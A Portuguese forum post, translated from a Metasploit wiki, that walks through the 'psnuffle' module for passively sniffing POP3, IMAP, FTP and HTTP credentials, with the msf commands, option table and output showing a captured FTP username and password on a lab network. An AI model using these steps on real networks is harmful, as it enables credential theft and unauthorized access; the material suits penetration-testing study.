Recentemente, Max Moser liberou um módulo para o Metasploit chamado "psnuffle" que é um sniffer de password bem parecido com a ferramenta dsniff. Atualmente ele suporta os serviços pop3, imap, ftp e HTTP GET. Você pode saber mais sobre o módulo no blog oficial do criador:
Usar o módulo "psnuffle" é extremamente fácil. Tem algumas opções disponíveis que funcionam muito bem. Meio a ("out of the box").
Como você pode ver, tem algumas opções disponíveis, incluindo a capacidade de importar um arquivo capturado por PCAP. Vamos executar um scanner com algumas das opções:
Capturamos um login de um FTP com êxito. Enfim... é uma excelente ferramenta para recompilar informações de maneira passiva.
P.S: A tradução não ficou das melhores mas, fiz o possível.
Texto original:
metasploit-es.com.ar/wiki/index.php/Password_Sniffing
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Código:
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 1 yes The number of seconds to wait for new data
Código:
msf auxiliary(psnuffle) > run
Auxiliary module running as background job
Loaded protocol FTP from /pentest/exploits/framework3/data/exploits/psnuffle/ftp.rb...
Loaded protocol IMAP from /pentest/exploits/framework3/data/exploits/psnuffle/imap.rb...
Loaded protocol POP3 from /pentest/exploits/framework3/data/exploits/psnuffle/pop3.rb...
Loaded protocol URL from /pentest/exploits/framework3/data/exploits/psnuffle/url.rb...
Sniffing traffic.....
Successful FTP Login: 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Com 3CDaemon FTP Server Version 2.0)
P.S: A tradução não ficou das melhores mas, fiz o possível.
Texto original:
metasploit-es.com.ar/wiki/index.php/Password_Sniffing
Comment